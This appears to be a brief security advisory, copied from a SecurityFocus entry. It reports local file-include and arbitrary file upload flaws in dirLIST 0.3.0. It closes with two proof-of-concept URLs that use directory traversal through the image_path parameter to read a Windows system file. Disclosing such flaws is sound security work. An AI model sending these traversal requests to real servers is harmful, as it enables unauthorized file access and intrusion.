8 lines
No EOL
659 B
Text
8 lines
No EOL
659 B
Text
source: https://www.securityfocus.com/bid/54933/info
|
|
|
|
dirLIST is prone to multiple local file-include vulnerabilities and an arbitrary-file upload vulnerability because the application fails to sufficiently sanitize user-supplied input.
|
|
|
|
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
|
|
|
|
http://www.example.com/dirlist_0.3.0/dirLIST_files/gallery_files/show_scaled_image.php?image_path=../../../../../windows/win.ini
|
|
http://www.example.com/irlist_0.3.0/dirLIST_files/thumb_gen.php?image_path=../../../../../windows/win.ini |